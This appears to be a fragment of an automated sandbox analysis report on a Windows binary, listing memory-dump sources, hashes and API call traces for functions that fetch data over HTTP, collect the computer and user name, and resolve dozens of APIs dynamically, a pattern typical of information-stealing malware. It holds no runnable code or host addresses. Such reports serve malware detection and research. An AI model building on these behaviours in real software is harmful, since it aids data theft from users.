                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 464934a0711fbd2db57d232d8715835f86969681bded39744b7e0bd4a8b5da38
                              • Instruction ID: 70744519920e1460be2206e91c100d3a4755e3d6b75f5b1a3b77cbd3f07e1d32
                              • Opcode Fuzzy Hash: 464934a0711fbd2db57d232d8715835f86969681bded39744b7e0bd4a8b5da38
                              • Instruction Fuzzy Hash: 47410F70FC67046A8664FBA5A95EF9D77665F9A70AF81B060AC00522C3CFE07548C722
                              Function 00936280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • Part of subcall function 009347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00934839
                                • Part of subcall function 009347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00934849
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              • InternetOpenA.WININET(00950DFE,00000001,00000000,00000000,00000000), ref: 009362E1
                              • StrCmpCA.SHLWAPI(?,010FE238), ref: 00936303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00936335
                              • HttpOpenRequestA.WININET(00000000,GET,?,010FD8B8,00000000,00000000,00400100,00000000), ref: 00936385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009363BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009363D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009363FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0093646D
                              • InternetCloseHandle.WININET(00000000), ref: 009364EF
                              • InternetCloseHandle.WININET(00000000), ref: 009364F9
                              • InternetCloseHandle.WININET(00000000), ref: 00936503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 15220ad5397087159140148160aa1a9ce684bf8e0f5ecbaaa7db7c4aeb4ea3a3
                              • Instruction ID: 44cff992201395ad47bdee7d934bd4aa976205a06850b1e8d273f03bc709d2a2
                              • Opcode Fuzzy Hash: 15220ad5397087159140148160aa1a9ce684bf8e0f5ecbaaa7db7c4aeb4ea3a3
                              • Instruction Fuzzy Hash: FE712E71A40218ABEB24DFA0DC49FEE7778FB84705F108198F50A6B1D0DBB56A85CF52
                              Function 009478E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1275 9478e0-947937 GetProcessHeap RtlAllocateHeap GetComputerNameA 1276 947942-947945 1275->1276 1277 947939-94793e 1275->1277 1278 947962-947972 1276->1278 1277->1278
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00947910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00947917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 0094792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 81c4767dcb64397c1b14623a2ee5d0f24c547e1020d3b23c5a4e1a6588ce0544
                              • Instruction ID: 141e3c857e02dfc20a55d0435e074817dd93af7d3a2f1a425a45ab724320d942
                              • Opcode Fuzzy Hash: 81c4767dcb64397c1b14623a2ee5d0f24c547e1020d3b23c5a4e1a6588ce0544
                              • Instruction Fuzzy Hash: 810181B1A04208EBC754DF99DD45FAEFBBCFB44B21F10425AFA45E3280D77459448BA2
                              Function 00947850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009311B7), ref: 00947880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00947887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0094789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: bb2efe31865066094cf7f7628668bc26ce07e474e99a9806aff3a3fd48bfb4fe
                              • Instruction ID: d2e8a672d4b882b1481760b3cd24d3a066ae4faca9ef5b2f0a37785e7d6ae4c9
                              • Opcode Fuzzy Hash: bb2efe31865066094cf7f7628668bc26ce07e474e99a9806aff3a3fd48bfb4fe
                              • Instruction Fuzzy Hash: 6FF04FB1944208AFC714DF98DD4AFAEFBB8EB44711F10065AFA05A3680C77819448BA2
                              Function 00931160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 59362cef8abfdb3d57d551ac67321eda20de4781f0c868711c10ec224dd8516b
                              • Instruction ID: 0f90b748f216af56805f1b9ddcd8cc7a3a25760013c21e6096c1af7058fee9e7
                              • Opcode Fuzzy Hash: 59362cef8abfdb3d57d551ac67321eda20de4781f0c868711c10ec224dd8516b
                              • Instruction Fuzzy Hash: DAD05E7490430CDBCB04DFE0D8496DDBB78FB48312F000555D90963340EE3068C2CAA6
                              Function 00949C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 949c10-949c1a 634 94a036-94a0ca LoadLibraryA * 8 633->634 635 949c20-94a031 GetProcAddress * 43 633->635 636 94a146-94a14d 634->636 637 94a0cc-94a141 GetProcAddress * 5 634->637 635->634 638 94a216-94a21d 636->638 639 94a153-94a211 GetProcAddress * 8 636->639 637->636 640 94a21f-94a293 GetProcAddress * 5 638->640 641 94a298-94a29f 638->641 639->638 640->641 642 94a2a5-94a332 GetProcAddress * 6 641->642 643 94a337-94a33e 641->643 642->643 644 94a344-94a41a GetProcAddress * 9 643->644 645 94a41f-94a426 643->645 644->645 646 94a4a2-94a4a9 645->646 647 94a428-94a49d GetProcAddress * 5 645->647 648 94a4dc-94a4e3 646->648 649 94a4ab-94a4d7 GetProcAddress * 2 646->649 647->646 650 94a515-94a51c 648->650 651 94a4e5-94a510 GetProcAddress * 2 648->651 649->648 652 94a612-94a619 650->652 653 94a522-94a60d GetProcAddress * 10 650->653 651->650 654 94a67d-94a684 652->654 655 94a61b-94a678 GetProcAddress * 4 652->655 653->652 656 94a686-94a699 GetProcAddress 654->656 657 94a69e-94a6a5 654->657 655->654 656->657 658 94a6a7-94a703 GetProcAddress * 4 657->658 659 94a708-94a709 657->659 658->659
                              APIs
                              • GetProcAddress.KERNEL32(75900000,010E57C8), ref: 00949C2D
                              • GetProcAddress.KERNEL32(75900000,010E5448), ref: 00949C45
                              • GetProcAddress.KERNEL32(75900000,010F8F88), ref: 00949C5E
                              • GetProcAddress.KERNEL32(75900000,010F8F58), ref: 00949C76
                              • GetProcAddress.KERNEL32(75900000,010FC860), ref: 00949C8E
                              • GetProcAddress.KERNEL32(75900000,010FC800), ref: 00949CA7
                              • GetProcAddress.KERNEL32(75900000,010EB4F8), ref: 00949CBF
                              • GetProcAddress.KERNEL32(75900000,010FCA10), ref: 00949CD7
                              • GetProcAddress.KERNEL32(75900000,010FC848), ref: 00949CF0
                              • GetProcAddress.KERNEL32(75900000,010FC920), ref: 00949D08
                              • GetProcAddress.KERNEL32(75900000,010FC878), ref: 00949D20
                              • GetProcAddress.KERNEL32(75900000,010E54E8), ref: 00949D39
                              • GetProcAddress.KERNEL32(75900000,010E5408), ref: 00949D51
                              • GetProcAddress.KERNEL32(75900000,010E54A8), ref: 00949D69
                              • GetProcAddress.KERNEL32(75900000,010E54C8), ref: 00949D82
                              • GetProcAddress.KERNEL32(75900000,010FC980), ref: 00949D9A
                              • GetProcAddress.KERNEL32(75900000,010FC968), ref: 00949DB2
                              • GetProcAddress.KERNEL32(75900000,010EB520), ref: 00949DCB
                              • GetProcAddress.KERNEL32(75900000,010E5508), ref: 00949DE3
                              • GetProcAddress.KERNEL32(75900000,010FC818), ref: 00949DFB
                              • GetProcAddress.KERNEL32(75900000,010FC890), ref: 00949E14
                              • GetProcAddress.KERNEL32(75900000,010FC8A8), ref: 00949E2C
                              • GetProcAddress.KERNEL32(75900000,010FCA70), ref: 00949E44
                              • GetProcAddress.KERNEL32(75900000,010E5548), ref: 00949E5D
                              • GetProcAddress.KERNEL32(75900000,010FC950), ref: 00949E75
                              • GetProcAddress.KERNEL32(75900000,010FC830), ref: 00949E8D
                              • GetProcAddress.KERNEL32(75900000,010FC8C0), ref: 00949EA6
                              • GetProcAddress.KERNEL32(75900000,010FC938), ref: 00949EBE
                              • GetProcAddress.KERNEL32(75900000,010FC7E8), ref: 00949ED6
                              • GetProcAddress.KERNEL32(75900000,010FC8D8), ref: 00949EEF
                              • GetProcAddress.KERNEL32(75900000,010FC8F0), ref: 00949F07
                              • GetProcAddress.KERNEL32(75900000,010FC908), ref: 00949F1F
                              • GetProcAddress.KERNEL32(75900000,010FCA88), ref: 00949F38
                              • GetProcAddress.KERNEL32(75900000,010F9CE0), ref: 00949F50
                              • GetProcAddress.KERNEL32(75900000,010FC998), ref: 00949F68
                              • GetProcAddress.KERNEL32(75900000,010FC9B0), ref: 00949F81
                              • GetProcAddress.KERNEL32(75900000,010E5568), ref: 00949F99
                              • GetProcAddress.KERNEL32(75900000,010FC9C8), ref: 00949FB1
                              • GetProcAddress.KERNEL32(75900000,010E5588), ref: 00949FCA
                              • GetProcAddress.KERNEL32(75900000,010FC9E0), ref: 00949FE2
                              • GetProcAddress.KERNEL32(75900000,010FC9F8), ref: 00949FFA
                              • GetProcAddress.KERNEL32(75900000,010E55C8), ref: 0094A013
                              • GetProcAddress.KERNEL32(75900000,010E55E8), ref: 0094A02B
                              • LoadLibraryA.KERNEL32(010FCA28,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A03D
                              • LoadLibraryA.KERNEL32(010FCA40,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A04E
                              • LoadLibraryA.KERNEL32(010FCA58,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A060
                              • LoadLibraryA.KERNEL32(010FCAA0,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A072
                              • LoadLibraryA.KERNEL32(010FC7B8,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A083
                              • LoadLibraryA.KERNEL32(010FC7D0,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A095
                              • LoadLibraryA.KERNEL32(010FCD40,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A0A7
                              • LoadLibraryA.KERNEL32(010FCAD0,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A0B8
                              • GetProcAddress.KERNEL32(75FD0000,010E59E8), ref: 0094A0DA
                              • GetProcAddress.KERNEL32(75FD0000,010FCC98), ref: 0094A0F2
                              • GetProcAddress.KERNEL32(75FD0000,010F8828), ref: 0094A10A
                              • GetProcAddress.KERNEL32(75FD0000,010FCD10), ref: 0094A123
                              • GetProcAddress.KERNEL32(75FD0000,010E5A08), ref: 0094A13B
                              • GetProcAddress.KERNEL32(734B0000,010EB138), ref: 0094A160
                              • GetProcAddress.KERNEL32(734B0000,010E5928), ref: 0094A179
                              • GetProcAddress.KERNEL32(734B0000,010EAEE0), ref: 0094A191
                              • GetProcAddress.KERNEL32(734B0000,010FCB78), ref: 0094A1A9
                              • GetProcAddress.KERNEL32(734B0000,010FCC20), ref: 0094A1C2
                              • GetProcAddress.KERNEL32(734B0000,010E5908), ref: 0094A1DA
                              • GetProcAddress.KERNEL32(734B0000,010E5B48), ref: 0094A1F2
                              • GetProcAddress.KERNEL32(734B0000,010FCAE8), ref: 0094A20B
                              • GetProcAddress.KERNEL32(763B0000,010E5AA8), ref: 0094A22C
                              • GetProcAddress.KERNEL32(763B0000,010E5A28), ref: 0094A244
                              • GetProcAddress.KERNEL32(763B0000,010FCB18), ref: 0094A25D
                              • GetProcAddress.KERNEL32(763B0000,010FCD70), ref: 0094A275
                              • GetProcAddress.KERNEL32(763B0000,010E5A48), ref: 0094A28D
                              • GetProcAddress.KERNEL32(750F0000,010EB1B0), ref: 0094A2B3
                              • GetProcAddress.KERNEL32(750F0000,010EB200), ref: 0094A2CB
                              • GetProcAddress.KERNEL32(750F0000,010FCB00), ref: 0094A2E3
                              • GetProcAddress.KERNEL32(750F0000,010E5AE8), ref: 0094A2FC
                              • GetProcAddress.KERNEL32(750F0000,010E5988), ref: 0094A314
                              • GetProcAddress.KERNEL32(750F0000,010EAF30), ref: 0094A32C
                              • GetProcAddress.KERNEL32(75A50000,010FCC08), ref: 0094A352
                              • GetProcAddress.KERNEL32(75A50000,010E5808), ref: 0094A36A
                              • GetProcAddress.KERNEL32(75A50000,010F8898), ref: 0094A382
                              • GetProcAddress.KERNEL32(75A50000,010FCB60), ref: 0094A39B
                              • GetProcAddress.KERNEL32(75A50000,010FCC38), ref: 0094A3B3
                              • GetProcAddress.KERNEL32(75A50000,010E5A88), ref: 0094A3CB
                              • GetProcAddress.KERNEL32(75A50000,010E5B08), ref: 0094A3E4
                              • GetProcAddress.KERNEL32(75A50000,010FCB90), ref: 0094A3FC
                              • GetProcAddress.KERNEL32(75A50000,010FCBA8), ref: 0094A414
                              • GetProcAddress.KERNEL32(75070000,010E59A8), ref: 0094A436
                              • GetProcAddress.KERNEL32(75070000,010FCBF0), ref: 0094A44E
                              • GetProcAddress.KERNEL32(75070000,010FCAB8), ref: 0094A466
                              • GetProcAddress.KERNEL32(75070000,010FCD58), ref: 0094A47F
                              • GetProcAddress.KERNEL32(75070000,010FCBC0), ref: 0094A497
                              • GetProcAddress.KERNEL32(74E50000,010E5948), ref: 0094A4B8
                              • GetProcAddress.KERNEL32(74E50000,010E5888), ref: 0094A4D1
                              • GetProcAddress.KERNEL32(75320000,010E58A8), ref: 0094A4F2
                              • GetProcAddress.KERNEL32(75320000,010FCC50), ref: 0094A50A
                              • GetProcAddress.KERNEL32(6F060000,010E5A68), ref: 0094A530
                              • GetProcAddress.KERNEL32(6F060000,010E5AC8), ref: 0094A548
                              • GetProcAddress.KERNEL32(6F060000,010E5828), ref: 0094A560
                              • GetProcAddress.KERNEL32(6F060000,010FCD28), ref: 0094A579
                              • GetProcAddress.KERNEL32(6F060000,010E5B28), ref: 0094A591
                              • GetProcAddress.KERNEL32(6F060000,010E5968), ref: 0094A5A9
                              • GetProcAddress.KERNEL32(6F060000,010E58C8), ref: 0094A5C2
                              • GetProcAddress.KERNEL32(6F060000,010E5B88), ref: 0094A5DA
                              • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0094A5F1
                              • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0094A607
                              • GetProcAddress.KERNEL32(74E00000,010FCC80), ref: 0094A629
                              • GetProcAddress.KERNEL32(74E00000,010F88F8), ref: 0094A641
                              • GetProcAddress.KERNEL32(74E00000,010FCB30), ref: 0094A659
                              • GetProcAddress.KERNEL32(74E00000,010FCD88), ref: 0094A672
                              • GetProcAddress.KERNEL32(74DF0000,010E5848), ref: 0094A693
                              • GetProcAddress.KERNEL32(6E340000,010FCDA0), ref: 0094A6B4
                              • GetProcAddress.KERNEL32(6E340000,010E59C8), ref: 0094A6CD
                              • GetProcAddress.KERNEL32(6E340000,010FCCB0), ref: 0094A6E5
                              • GetProcAddress.KERNEL32(6E340000,010FCBD8), ref: 0094A6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
